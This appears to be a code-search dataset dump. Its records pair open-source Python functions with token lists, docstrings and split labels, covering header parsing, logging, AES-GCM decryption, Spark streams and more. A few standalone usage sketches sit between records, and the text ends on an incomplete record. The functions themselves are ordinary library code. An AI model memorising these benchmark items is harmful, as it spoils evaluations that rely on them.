https://github.com/RudolfCardinal/pythonlib/blob/0b84cb35f38bd7d8723958dae51b480a829b7227/cardinal_pythonlib/wsgi/reverse_proxied_mw.py#L50-L70
def ip_addresses_from_xff(value: str) -> List[str]: """ Returns a list of IP addresses (as strings), given the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header. Args: value: the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header Returns: a list of IP address as strings See: - https://en.wikipedia.org/wiki/X-Forwarded-For - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa - NOT THIS: http://tools.ietf.org/html/rfc7239 """ if not value: return [] return [x.strip() for x in value.split(",")]
[ "def", "ip_addresses_from_xff", "(", "value", ":", "str", ")", "->", "List", "[", "str", "]", ":", "if", "not", "value", ":", "return", "[", "]", "return", "[", "x", ".", "strip", "(", ")", "for", "x", "in", "value", ".", "split", "(", "\",\"", ")", "]" ]
Returns a list of IP addresses (as strings), given the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header. Args: value: the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header Returns: a list of IP address as strings See: - https://en.wikipedia.org/wiki/X-Forwarded-For - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa - NOT THIS: http://tools.ietf.org/html/rfc7239
[ "Returns", "a", "list", "of", "IP", "addresses", "(", "as", "strings", ")", "given", "the", "value", "of", "an", "HTTP", "X", "-", "Forwarded", "-", "For", "(", "or", "WSGI", "HTTP_X_FORWARDED_FOR", ")", "header", "." ]
python
train
31.571429
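A usage sketch of this kind of header parsing, with the splitter re-written inline rather than imported from cardinal_pythonlib; the header value is made up:

from typing import List

def ip_addresses_from_xff(value: str) -> List[str]:
    # Empty or missing header -> no client addresses.
    if not value:
        return []
    # X-Forwarded-For is a comma-separated chain: client, proxy1, proxy2, ...
    return [x.strip() for x in value.split(",")]

header = "203.0.113.7, 198.51.100.2 , 10.0.0.1"
print(ip_addresses_from_xff(header))  # ['203.0.113.7', '198.51.100.2', '10.0.0.1']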
cloud-custodian/cloud-custodian
c7n/log.py
https://github.com/cloud-custodian/cloud-custodian/blob/52ef732eb3d7bc939d1579faf519314814695c08/c7n/log.py#L123-L129
def flush(self): """Ensure all logging output has been flushed.""" if self.shutdown: return self.flush_buffers(force=True) self.queue.put(FLUSH_MARKER) self.queue.join()
[ "def", "flush", "(", "self", ")", ":", "if", "self", ".", "shutdown", ":", "return", "self", ".", "flush_buffers", "(", "force", "=", "True", ")", "self", ".", "queue", ".", "put", "(", "FLUSH_MARKER", ")", "self", ".", "queue", ".", "join", "(", ")" ]
Ensure all logging output has been flushed.
[ "Ensure", "all", "logging", "output", "has", "been", "flushed", "." ]
python
train
30.714286
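A generic sketch of the flush-marker pattern the handler above relies on, using only the standard library; FLUSH_MARKER and the worker loop here are illustrative stand-ins for c7n's internals:

import queue
import threading

FLUSH_MARKER = object()   # sentinel telling the worker to push buffered output now
q = queue.Queue()

def worker():
    while True:
        item = q.get()
        if item is not FLUSH_MARKER:
            print("shipping log record:", item)
        # (a real handler would force-flush its buffers when it sees the marker)
        q.task_done()   # lets q.join() in flush() return once everything is handled

threading.Thread(target=worker, daemon=True).start()

def flush():
    q.put(FLUSH_MARKER)
    q.join()   # blocks until the worker has processed the marker and everything before it

q.put("hello")
flush()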
mozilla/elasticutils
elasticutils/contrib/django/__init__.py
https://github.com/mozilla/elasticutils/blob/b880cc5d51fb1079b0581255ec664c1ec934656e/elasticutils/contrib/django/__init__.py#L185-L190
def get_doctypes(self, default_doctypes=None): """Returns the doctypes (or mapping type names) to use.""" doctypes = self.type.get_mapping_type_name() if isinstance(doctypes, six.string_types): doctypes = [doctypes] return super(S, self).get_doctypes(default_doctypes=doctypes)
[ "def", "get_doctypes", "(", "self", ",", "default_doctypes", "=", "None", ")", ":", "doctypes", "=", "self", ".", "type", ".", "get_mapping_type_name", "(", ")", "if", "isinstance", "(", "doctypes", ",", "six", ".", "string_types", ")", ":", "doctypes", "=", "[", "doctypes", "]", "return", "super", "(", "S", ",", "self", ")", ".", "get_doctypes", "(", "default_doctypes", "=", "doctypes", ")" ]
Returns the doctypes (or mapping type names) to use.
[ "Returns", "the", "doctypes", "(", "or", "mapping", "type", "names", ")", "to", "use", "." ]
python
train
52.666667
ic-labs/django-icekit
icekit/publishing/managers.py
https://github.com/ic-labs/django-icekit/blob/c507ea5b1864303732c53ad7c5800571fca5fa94/icekit/publishing/managers.py#L201-L233
def _queryset_iterator(qs): """ Override default iterator to wrap returned items in a publishing sanity-checker "booby trap" to lazily raise an exception if DRAFT items are mistakenly returned and mis-used in a public context where only PUBLISHED items should be used. This booby trap is added when all of: - the publishing middleware is active, and therefore able to report accurately whether the request is in a drafts-permitted context - the publishing middleware tells us we are not in a drafts-permitted context, which means only published items should be used. """ # Avoid double-processing draft items in our custom iterator when we # are in a `PublishingQuerySet` that is also a subclass of the # monkey-patched `UrlNodeQuerySet` if issubclass(type(qs), UrlNodeQuerySet): super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs) else: super_without_boobytrap_iterator = super(PublishingQuerySet, qs) if is_publishing_middleware_active() \ and not is_draft_request_context(): for item in super_without_boobytrap_iterator.iterator(): if getattr(item, 'publishing_is_draft', False): yield DraftItemBoobyTrap(item) else: yield item else: for item in super_without_boobytrap_iterator.iterator(): yield item
[ "def", "_queryset_iterator", "(", "qs", ")", ":", "# Avoid double-processing draft items in our custom iterator when we", "# are in a `PublishingQuerySet` that is also a subclass of the", "# monkey-patched `UrlNodeQuerySet`", "if", "issubclass", "(", "type", "(", "qs", ")", ",", "UrlNodeQuerySet", ")", ":", "super_without_boobytrap_iterator", "=", "super", "(", "UrlNodeQuerySet", ",", "qs", ")", "else", ":", "super_without_boobytrap_iterator", "=", "super", "(", "PublishingQuerySet", ",", "qs", ")", "if", "is_publishing_middleware_active", "(", ")", "and", "not", "is_draft_request_context", "(", ")", ":", "for", "item", "in", "super_without_boobytrap_iterator", ".", "iterator", "(", ")", ":", "if", "getattr", "(", "item", ",", "'publishing_is_draft'", ",", "False", ")", ":", "yield", "DraftItemBoobyTrap", "(", "item", ")", "else", ":", "yield", "item", "else", ":", "for", "item", "in", "super_without_boobytrap_iterator", ".", "iterator", "(", ")", ":", "yield", "item" ]
Override default iterator to wrap returned items in a publishing sanity-checker "booby trap" to lazily raise an exception if DRAFT items are mistakenly returned and mis-used in a public context where only PUBLISHED items should be used. This booby trap is added when all of: - the publishing middleware is active, and therefore able to report accurately whether the request is in a drafts-permitted context - the publishing middleware tells us we are not in a drafts-permitted context, which means only published items should be used.
[ "Override", "default", "iterator", "to", "wrap", "returned", "items", "in", "a", "publishing", "sanity", "-", "checker", "booby", "trap", "to", "lazily", "raise", "an", "exception", "if", "DRAFT", "items", "are", "mistakenly", "returned", "and", "mis", "-", "used", "in", "a", "public", "context", "where", "only", "PUBLISHED", "items", "should", "be", "used", "." ]
python
train
41.606061
dade-ai/snipy
snipy/plt/ploting.py
https://github.com/dade-ai/snipy/blob/408520867179f99b3158b57520e2619f3fecd69b/snipy/plt/ploting.py#L433-L444
def imbound(clspatch, *args, **kwargs): """ :param clspatch: :param args: :param kwargs: :return: """ # todo : add example c = kwargs.pop('color', kwargs.get('edgecolor', None)) kwargs.update(facecolor='none', edgecolor=c) return impatch(clspatch, *args, **kwargs)
[ "def", "imbound", "(", "clspatch", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "# todo : add example", "c", "=", "kwargs", ".", "pop", "(", "'color'", ",", "kwargs", ".", "get", "(", "'edgecolor'", ",", "None", ")", ")", "kwargs", ".", "update", "(", "facecolor", "=", "'none'", ",", "edgecolor", "=", "c", ")", "return", "impatch", "(", "clspatch", ",", "*", "args", ",", "*", "*", "kwargs", ")" ]
:param clspatch: :param args: :param kwargs: :return:
[ ":", "param", "clspatch", ":", ":", "param", "args", ":", ":", "param", "kwargs", ":", ":", "return", ":" ]
python
valid
24.5
marl/jams
scripts/jams_to_lab.py
https://github.com/marl/jams/blob/b16778399b9528efbd71434842a079f7691a7a66/scripts/jams_to_lab.py#L156-L182
def parse_arguments(args): '''Parse arguments from the command line''' parser = argparse.ArgumentParser(description='Convert JAMS to .lab files') parser.add_argument('-c', '--comma-separated', dest='csv', action='store_true', default=False, help='Output in .csv instead of .lab') parser.add_argument('--comment', dest='comment_char', type=str, default='#', help='Comment character') parser.add_argument('-n', '--namespace', dest='namespaces', nargs='+', default=['.*'], help='One or more namespaces to output. Default is all.') parser.add_argument('jams_file', help='Path to the input jams file') parser.add_argument('output_prefix', help='Prefix for output files') return vars(parser.parse_args(args))
[ "def", "parse_arguments", "(", "args", ")", ":", "parser", "=", "argparse", ".", "ArgumentParser", "(", "description", "=", "'Convert JAMS to .lab files'", ")", "parser", ".", "add_argument", "(", "'-c'", ",", "'--comma-separated'", ",", "dest", "=", "'csv'", ",", "action", "=", "'store_true'", ",", "default", "=", "False", ",", "help", "=", "'Output in .csv instead of .lab'", ")", "parser", ".", "add_argument", "(", "'--comment'", ",", "dest", "=", "'comment_char'", ",", "type", "=", "str", ",", "default", "=", "'#'", ",", "help", "=", "'Comment character'", ")", "parser", ".", "add_argument", "(", "'-n'", ",", "'--namespace'", ",", "dest", "=", "'namespaces'", ",", "nargs", "=", "'+'", ",", "default", "=", "[", "'.*'", "]", ",", "help", "=", "'One or more namespaces to output. Default is all.'", ")", "parser", ".", "add_argument", "(", "'jams_file'", ",", "help", "=", "'Path to the input jams file'", ")", "parser", ".", "add_argument", "(", "'output_prefix'", ",", "help", "=", "'Prefix for output files'", ")", "return", "vars", "(", "parser", ".", "parse_args", "(", "args", ")", ")" ]
Parse arguments from the command line
[ "Parse", "arguments", "from", "the", "command", "line" ]
python
valid
37.148148
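A usage sketch of driving an argparse-based converter like the one above by passing an explicit argument list instead of sys.argv; the file names are made up:

import argparse

parser = argparse.ArgumentParser(description='Convert JAMS to .lab files')
parser.add_argument('-c', '--comma-separated', dest='csv', action='store_true', default=False)
parser.add_argument('jams_file')
parser.add_argument('output_prefix')

# Parsing an explicit list (as parse_arguments(args) does) keeps this testable
# without touching sys.argv.
params = vars(parser.parse_args(['-c', 'example.jams', 'out_']))
print(params)  # {'csv': True, 'jams_file': 'example.jams', 'output_prefix': 'out_'}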
phoebe-project/phoebe2
phoebe/backend/universe.py
https://github.com/phoebe-project/phoebe2/blob/e64b8be683977064e2d55dd1b3ac400f64c3e379/phoebe/backend/universe.py#L1370-L1375
def polar_direction_xyz(self): """ get current polar direction in Roche (xyz) coordinates """ return mesh.spin_in_roche(self.polar_direction_uvw, self.true_anom, self.elongan, self.eincl).astype(float)
[ "def", "polar_direction_xyz", "(", "self", ")", ":", "return", "mesh", ".", "spin_in_roche", "(", "self", ".", "polar_direction_uvw", ",", "self", ".", "true_anom", ",", "self", ".", "elongan", ",", "self", ".", "eincl", ")", ".", "astype", "(", "float", ")" ]
get current polar direction in Roche (xyz) coordinates
[ "get", "current", "polar", "direction", "in", "Roche", "(", "xyz", ")", "coordinates" ]
python
train
43.666667
latchset/jwcrypto
jwcrypto/jwa.py
https://github.com/latchset/jwcrypto/blob/961df898dc08f63fe3d900f2002618740bc66b4a/jwcrypto/jwa.py#L979-L994
def decrypt(self, k, a, iv, e, t): """ Decrypt according to the selected encryption and hashing functions. :param k: Encryption key (optional) :param a: Additional Authenticated Data :param iv: Initialization Vector :param e: Ciphertext :param t: Authentication Tag Returns plaintext or raises an error """ cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t), backend=self.backend) decryptor = cipher.decryptor() decryptor.authenticate_additional_data(a) return decryptor.update(e) + decryptor.finalize()
[ "def", "decrypt", "(", "self", ",", "k", ",", "a", ",", "iv", ",", "e", ",", "t", ")", ":", "cipher", "=", "Cipher", "(", "algorithms", ".", "AES", "(", "k", ")", ",", "modes", ".", "GCM", "(", "iv", ",", "t", ")", ",", "backend", "=", "self", ".", "backend", ")", "decryptor", "=", "cipher", ".", "decryptor", "(", ")", "decryptor", ".", "authenticate_additional_data", "(", "a", ")", "return", "decryptor", ".", "update", "(", "e", ")", "+", "decryptor", ".", "finalize", "(", ")" ]
Decrypt according to the selected encryption and hashing functions. :param k: Encryption key (optional) :param a: Additional Authenticated Data :param iv: Initialization Vector :param e: Ciphertext :param t: Authentication Tag Returns plaintext or raises an error
[ "Decrypt", "accoriding", "to", "the", "selected", "encryption", "and", "hashing", "functions", ".", ":", "param", "k", ":", "Encryption", "key", "(", "optional", ")", ":", "param", "a", ":", "Additional", "Authenticated", "Data", ":", "param", "iv", ":", "Initialization", "Vector", ":", "param", "e", ":", "Ciphertext", ":", "param", "t", ":", "Authentication", "Tag" ]
python
train
38.6875
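A round-trip sketch of AES-GCM with the `cryptography` package, which the method above wraps; note the record's method also threads through a backend attribute, which recent `cryptography` releases no longer require (an assumption here), and all key/IV/AAD values below are generated for illustration:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, iv, aad = os.urandom(32), os.urandom(12), b"header"

# Encrypt: GCM produces ciphertext plus an authentication tag.
enc = Cipher(algorithms.AES(key), modes.GCM(iv)).encryptor()
enc.authenticate_additional_data(aad)
ciphertext = enc.update(b"attack at dawn") + enc.finalize()
tag = enc.tag

# Decrypt: the tag goes back into modes.GCM; a bad tag or AAD raises InvalidTag.
dec = Cipher(algorithms.AES(key), modes.GCM(iv, tag)).decryptor()
dec.authenticate_additional_data(aad)
print(dec.update(ciphertext) + dec.finalize())  # b'attack at dawn'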
fabioz/PyDev.Debugger
pydevd_attach_to_process/winappdbg/interactive.py
https://github.com/fabioz/PyDev.Debugger/blob/ed9c4307662a5593b8a7f1f3389ecd0e79b8c503/pydevd_attach_to_process/winappdbg/interactive.py#L2012-L2050
def do_register(self, arg): """ [~thread] r - print(the value of all registers [~thread] r <register> - print(the value of a register [~thread] r <register>=<value> - change the value of a register [~thread] register - print(the value of all registers [~thread] register <register> - print(the value of a register [~thread] register <register>=<value> - change the value of a register """ arg = arg.strip() if not arg: self.print_current_location() else: equ = arg.find('=') if equ >= 0: register = arg[:equ].strip() value = arg[equ+1:].strip() if not value: value = '0' self.change_register(register, value) else: value = self.input_register(arg) if value is None: raise CmdError("unknown register: %s" % arg) try: label = None thread = self.get_thread_from_prefix() process = thread.get_process() module = process.get_module_at_address(value) if module: label = module.get_label_at_address(value) except RuntimeError: label = None reg = arg.upper() val = HexDump.address(value) if label: print("%s: %s (%s)" % (reg, val, label)) else: print("%s: %s" % (reg, val))
[ "def", "do_register", "(", "self", ",", "arg", ")", ":", "arg", "=", "arg", ".", "strip", "(", ")", "if", "not", "arg", ":", "self", ".", "print_current_location", "(", ")", "else", ":", "equ", "=", "arg", ".", "find", "(", "'='", ")", "if", "equ", ">=", "0", ":", "register", "=", "arg", "[", ":", "equ", "]", ".", "strip", "(", ")", "value", "=", "arg", "[", "equ", "+", "1", ":", "]", ".", "strip", "(", ")", "if", "not", "value", ":", "value", "=", "'0'", "self", ".", "change_register", "(", "register", ",", "value", ")", "else", ":", "value", "=", "self", ".", "input_register", "(", "arg", ")", "if", "value", "is", "None", ":", "raise", "CmdError", "(", "\"unknown register: %s\"", "%", "arg", ")", "try", ":", "label", "=", "None", "thread", "=", "self", ".", "get_thread_from_prefix", "(", ")", "process", "=", "thread", ".", "get_process", "(", ")", "module", "=", "process", ".", "get_module_at_address", "(", "value", ")", "if", "module", ":", "label", "=", "module", ".", "get_label_at_address", "(", "value", ")", "except", "RuntimeError", ":", "label", "=", "None", "reg", "=", "arg", ".", "upper", "(", ")", "val", "=", "HexDump", ".", "address", "(", "value", ")", "if", "label", ":", "print", "(", "\"%s: %s (%s)\"", "%", "(", "reg", ",", "val", ",", "label", ")", ")", "else", ":", "print", "(", "\"%s: %s\"", "%", "(", "reg", ",", "val", ")", ")" ]
[~thread] r - print(the value of all registers [~thread] r <register> - print(the value of a register [~thread] r <register>=<value> - change the value of a register [~thread] register - print(the value of all registers [~thread] register <register> - print(the value of a register [~thread] register <register>=<value> - change the value of a register
[ "[", "~thread", "]", "r", "-", "print", "(", "the", "value", "of", "all", "registers", "[", "~thread", "]", "r", "<register", ">", "-", "print", "(", "the", "value", "of", "a", "register", "[", "~thread", "]", "r", "<register", ">", "=", "<value", ">", "-", "change", "the", "value", "of", "a", "register", "[", "~thread", "]", "register", "-", "print", "(", "the", "value", "of", "all", "registers", "[", "~thread", "]", "register", "<register", ">", "-", "print", "(", "the", "value", "of", "a", "register", "[", "~thread", "]", "register", "<register", ">", "=", "<value", ">", "-", "change", "the", "value", "of", "a", "register" ]
python
train
40.666667
Esri/ArcREST
samples/query_agol_layer_using_ArcMap_Creds.py
https://github.com/Esri/ArcREST/blob/ab240fde2b0200f61d4a5f6df033516e53f2f416/samples/query_agol_layer_using_ArcMap_Creds.py#L43-L77
def main(*argv): """ main driver of program """ try: url = str(argv[0]) arcgisSH = ArcGISTokenSecurityHandler() if arcgisSH.valid == False: arcpy.AddError(arcgisSH.message) return fl = FeatureLayer( url=url, securityHandler=arcgisSH, initialize=True) res = fl.query(where="1=1",out_fields='*',returnGeometry=False) arcpy.AddMessage(res) arcpy.SetParameterAsText(1, str(res)) except arcpy.ExecuteError: line, filename, synerror = trace() arcpy.AddError("error on line: %s" % line) arcpy.AddError("error in file name: %s" % filename) arcpy.AddError("with error message: %s" % synerror) arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2)) except FunctionError, f_e: messages = f_e.args[0] arcpy.AddError("error in function: %s" % messages["function"]) arcpy.AddError("error on line: %s" % messages["line"]) arcpy.AddError("error in file name: %s" % messages["filename"]) arcpy.AddError("with error message: %s" % messages["synerror"]) arcpy.AddError("ArcPy Error Message: %s" % messages["arc"]) except: line, filename, synerror = trace() arcpy.AddError("error on line: %s" % line) arcpy.AddError("error in file name: %s" % filename) arcpy.AddError("with error message: %s" % synerror)
[ "def", "main", "(", "*", "argv", ")", ":", "try", ":", "url", "=", "str", "(", "argv", "[", "0", "]", ")", "arcgisSH", "=", "ArcGISTokenSecurityHandler", "(", ")", "if", "arcgisSH", ".", "valid", "==", "False", ":", "arcpy", ".", "AddError", "(", "arcgisSH", ".", "message", ")", "return", "fl", "=", "FeatureLayer", "(", "url", "=", "url", ",", "securityHandler", "=", "arcgisSH", ",", "initialize", "=", "True", ")", "res", "=", "fl", ".", "query", "(", "where", "=", "\"1=1\"", ",", "out_fields", "=", "'*'", ",", "returnGeometry", "=", "False", ")", "arcpy", ".", "AddMessage", "(", "res", ")", "arcpy", ".", "SetParameterAsText", "(", "1", ",", "str", "(", "res", ")", ")", "except", "arcpy", ".", "ExecuteError", ":", "line", ",", "filename", ",", "synerror", "=", "trace", "(", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "line", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "filename", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "synerror", ")", "arcpy", ".", "AddError", "(", "\"ArcPy Error Message: %s\"", "%", "arcpy", ".", "GetMessages", "(", "2", ")", ")", "except", "FunctionError", ",", "f_e", ":", "messages", "=", "f_e", ".", "args", "[", "0", "]", "arcpy", ".", "AddError", "(", "\"error in function: %s\"", "%", "messages", "[", "\"function\"", "]", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "messages", "[", "\"line\"", "]", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "messages", "[", "\"filename\"", "]", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "messages", "[", "\"synerror\"", "]", ")", "arcpy", ".", "AddError", "(", "\"ArcPy Error Message: %s\"", "%", "messages", "[", "\"arc\"", "]", ")", "except", ":", "line", ",", "filename", ",", "synerror", "=", "trace", "(", ")", "arcpy", ".", "AddError", "(", "\"error on line: %s\"", "%", "line", ")", "arcpy", ".", "AddError", "(", "\"error in file name: %s\"", "%", "filename", ")", "arcpy", ".", "AddError", "(", "\"with error message: %s\"", "%", "synerror", ")" ]
main driver of program
[ "main", "driver", "of", "program" ]
python
train
40.514286
apache/spark
python/pyspark/streaming/context.py
https://github.com/apache/spark/blob/618d6bff71073c8c93501ab7392c3cc579730f0b/python/pyspark/streaming/context.py#L331-L348
def union(self, *dstreams): """ Create a unified DStream from multiple DStreams of the same type and same slide duration. """ if not dstreams: raise ValueError("should have at least one DStream to union") if len(dstreams) == 1: return dstreams[0] if len(set(s._jrdd_deserializer for s in dstreams)) > 1: raise ValueError("All DStreams should have same serializer") if len(set(s._slideDuration for s in dstreams)) > 1: raise ValueError("All DStreams should have same slide duration") cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream jdstreams = SparkContext._gateway.new_array(cls, len(dstreams)) for i in range(0, len(dstreams)): jdstreams[i] = dstreams[i]._jdstream return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer)
[ "def", "union", "(", "self", ",", "*", "dstreams", ")", ":", "if", "not", "dstreams", ":", "raise", "ValueError", "(", "\"should have at least one DStream to union\"", ")", "if", "len", "(", "dstreams", ")", "==", "1", ":", "return", "dstreams", "[", "0", "]", "if", "len", "(", "set", "(", "s", ".", "_jrdd_deserializer", "for", "s", "in", "dstreams", ")", ")", ">", "1", ":", "raise", "ValueError", "(", "\"All DStreams should have same serializer\"", ")", "if", "len", "(", "set", "(", "s", ".", "_slideDuration", "for", "s", "in", "dstreams", ")", ")", ">", "1", ":", "raise", "ValueError", "(", "\"All DStreams should have same slide duration\"", ")", "cls", "=", "SparkContext", ".", "_jvm", ".", "org", ".", "apache", ".", "spark", ".", "streaming", ".", "api", ".", "java", ".", "JavaDStream", "jdstreams", "=", "SparkContext", ".", "_gateway", ".", "new_array", "(", "cls", ",", "len", "(", "dstreams", ")", ")", "for", "i", "in", "range", "(", "0", ",", "len", "(", "dstreams", ")", ")", ":", "jdstreams", "[", "i", "]", "=", "dstreams", "[", "i", "]", ".", "_jdstream", "return", "DStream", "(", "self", ".", "_jssc", ".", "union", "(", "jdstreams", ")", ",", "self", ",", "dstreams", "[", "0", "]", ".", "_jrdd_deserializer", ")" ]
Create a unified DStream from multiple DStreams of the same type and same slide duration.
[ "Create", "a", "unified", "DStream", "from", "multiple", "DStreams", "of", "the", "same", "type", "and", "same", "slide", "duration", "." ]
python
train
50.555556
tensorflow/cleverhans
cleverhans/experimental/certification/utils.py
https://github.com/tensorflow/cleverhans/blob/97488e215760547b81afc53f5e5de8ba7da5bd98/cleverhans/experimental/certification/utils.py#L22-L93
def initialize_dual(neural_net_params_object, init_dual_file=None, random_init_variance=0.01, init_nu=200.0): """Function to initialize the dual variables of the class. Args: neural_net_params_object: Object with the neural net weights, biases and types init_dual_file: Path to file containing dual variables, if the path is empty, perform random initialization Expects numpy dictionary with lambda_pos_0, lambda_pos_1, .. lambda_neg_0, lambda_neg_1, .. lambda_quad_0, lambda_quad_1, .. lambda_lu_0, lambda_lu_1, .. random_init_variance: variance for random initialization init_nu: Value to initialize nu variable with Returns: dual_var: dual variables initialized appropriately. """ lambda_pos = [] lambda_neg = [] lambda_quad = [] lambda_lu = [] if init_dual_file is None: for i in range(0, neural_net_params_object.num_hidden_layers + 1): initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_pos.append(tf.get_variable('lambda_pos_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_neg.append(tf.get_variable('lambda_neg_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_quad.append(tf.get_variable('lambda_quad_' + str(i), initializer=initializer, dtype=tf.float32)) initializer = (np.random.uniform(0, random_init_variance, size=( neural_net_params_object.sizes[i], 1))).astype(np.float32) lambda_lu.append(tf.get_variable('lambda_lu_' + str(i), initializer=initializer, dtype=tf.float32)) nu = tf.get_variable('nu', initializer=init_nu) else: # Loading from file dual_var_init_val = np.load(init_dual_file).item() for i in range(0, neural_net_params_object.num_hidden_layers + 1): lambda_pos.append( tf.get_variable('lambda_pos_' + str(i), initializer=dual_var_init_val['lambda_pos'][i], dtype=tf.float32)) lambda_neg.append( tf.get_variable('lambda_neg_' + str(i), initializer=dual_var_init_val['lambda_neg'][i], dtype=tf.float32)) lambda_quad.append( tf.get_variable('lambda_quad_' + str(i), initializer=dual_var_init_val['lambda_quad'][i], dtype=tf.float32)) lambda_lu.append( tf.get_variable('lambda_lu_' + str(i), initializer=dual_var_init_val['lambda_lu'][i], dtype=tf.float32)) nu = tf.get_variable('nu', initializer=1.0*dual_var_init_val['nu']) dual_var = {'lambda_pos': lambda_pos, 'lambda_neg': lambda_neg, 'lambda_quad': lambda_quad, 'lambda_lu': lambda_lu, 'nu': nu} return dual_var
[ "def", "initialize_dual", "(", "neural_net_params_object", ",", "init_dual_file", "=", "None", ",", "random_init_variance", "=", "0.01", ",", "init_nu", "=", "200.0", ")", ":", "lambda_pos", "=", "[", "]", "lambda_neg", "=", "[", "]", "lambda_quad", "=", "[", "]", "lambda_lu", "=", "[", "]", "if", "init_dual_file", "is", "None", ":", "for", "i", "in", "range", "(", "0", ",", "neural_net_params_object", ".", "num_hidden_layers", "+", "1", ")", ":", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_pos", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_pos_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_neg", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_neg_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_quad", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_quad_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "initializer", "=", "(", "np", ".", "random", ".", "uniform", "(", "0", ",", "random_init_variance", ",", "size", "=", "(", "neural_net_params_object", ".", "sizes", "[", "i", "]", ",", "1", ")", ")", ")", ".", "astype", "(", "np", ".", "float32", ")", "lambda_lu", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_lu_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "initializer", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "nu", "=", "tf", ".", "get_variable", "(", "'nu'", ",", "initializer", "=", "init_nu", ")", "else", ":", "# Loading from file", "dual_var_init_val", "=", "np", ".", "load", "(", "init_dual_file", ")", ".", "item", "(", ")", "for", "i", "in", "range", "(", "0", ",", "neural_net_params_object", ".", "num_hidden_layers", "+", "1", ")", ":", "lambda_pos", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_pos_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_pos'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_neg", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_neg_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_neg'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_quad", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_quad_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_quad'", "]", "[", "i", "]", ",", "dtype", "=", "tf", ".", "float32", ")", ")", "lambda_lu", ".", "append", "(", "tf", ".", "get_variable", "(", "'lambda_lu_'", "+", "str", "(", "i", ")", ",", "initializer", "=", "dual_var_init_val", "[", "'lambda_lu'", "]", "[", "i", "]", 
",", "dtype", "=", "tf", ".", "float32", ")", ")", "nu", "=", "tf", ".", "get_variable", "(", "'nu'", ",", "initializer", "=", "1.0", "*", "dual_var_init_val", "[", "'nu'", "]", ")", "dual_var", "=", "{", "'lambda_pos'", ":", "lambda_pos", ",", "'lambda_neg'", ":", "lambda_neg", ",", "'lambda_quad'", ":", "lambda_quad", ",", "'lambda_lu'", ":", "lambda_lu", ",", "'nu'", ":", "nu", "}", "return", "dual_var" ]
Function to initialize the dual variables of the class. Args: neural_net_params_object: Object with the neural net weights, biases and types init_dual_file: Path to file containing dual variables, if the path is empty, perform random initialization Expects numpy dictionary with lambda_pos_0, lambda_pos_1, .. lambda_neg_0, lambda_neg_1, .. lambda_quad_0, lambda_quad_1, .. lambda_lu_0, lambda_lu_1, .. random_init_variance: variance for random initialization init_nu: Value to initialize nu variable with Returns: dual_var: dual variables initialized appropriately.
[ "Function", "to", "initialize", "the", "dual", "variables", "of", "the", "class", "." ]
python
train
47.347222
nerdvegas/rez
src/rez/vendor/pygraph/classes/graph.py
